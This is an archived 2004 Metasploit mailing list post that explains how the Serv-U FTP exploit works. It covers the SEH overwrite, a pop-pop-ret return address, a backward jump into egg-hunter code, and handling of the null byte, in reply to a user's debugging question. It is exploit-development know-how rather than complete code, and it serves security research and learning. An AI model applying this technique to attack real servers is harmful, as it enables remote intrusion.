Metasploit mailing list archives
question about the return addr of the serv-u exploit
From: ninjatools at hush.com (ninjatools at hush.com)
Date: Fri, 9 Apr 2004 12:09:31 -0700
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Yeah, so you overwrite the SEH, which then jmps to a pop pop ret. The addr you listed hits a pop pop ret and xor eax, eax pop pop ret (depending on version) I believe... after the pop pop ret, we are at the dword before the seh address we overwrote. So it goes something like. [stuff][4 bytes of code][0x00401877] and then you land in the 4 bytes of code. I then jmp backwards from the 4 bytes into stuff, which is the searcher code that finds the rest of the payload, which was specified as the filename of the chmod command. It stops writing at the "\x00" in "\x77\x18\x40\x00", and then the string function cuts the buffer and null terminates it for us. That should be pretty much it. You can see the search code from Pex::Searcher, and the JmpShort code from Pex::x86 to do the jmp instruction on the fly based on the size of Pex::Searcher (so there is no nops, everything is absolute). There are some other tricks... exercise for the reader ? ;) Oh yeah, and hey mailing list people :) - -spoon
i'm wondering you can use the return addr 0x00401877, for the serv- u exploit i have test it with the framework and it works great. but i have once coded my own exploit and when i there use this offset it doesn't work because of the null-byte. i attached olly on the process and i can see that at the begining there is 0x00401877 in memory but the serv-u process pass some functions and then the NULL-bytes is suddently 0xeb. do u you any trick??? i hope i can get any answer, it will save me a lot of debugging effort.
-----BEGIN PGP SIGNATURE----- Note: This signature can be verified at https://www.hushtools.com/verify Version: Hush 2.3 wkYEARECAAYFAkB29iIACgkQtCeTLzI39eP0TgCgpipfI2MTGW9ee5qwfj2bCZp1FKAA n2HFoXGFgNozdCyjavNU8XjYAvSp =G7n2 -----END PGP SIGNATURE----- Concerned about your privacy? Follow this link to get FREE encrypted email: https://www.hushmail.com/?l=2 Free, ultra-private instant messaging with Hush Messenger https://www.hushmail.com/services.php?subloc=messenger&l=434 Promote security and make money with the Hushmail Affiliate Program: https://www.hushmail.com/about.php?subloc=affiliate&l=427
Current thread:
- question about the return addr of the serv-u exploit Guy Incognito (Apr 09)
- question about the return addr of the serv-u exploit H D Moore (Apr 09)
- <Possible follow-ups>
- question about the return addr of the serv-u exploit ninjatools at hush.com (Apr 09)
- [Article] Security tool more harmful than helpful? Technoboy (Apr 10)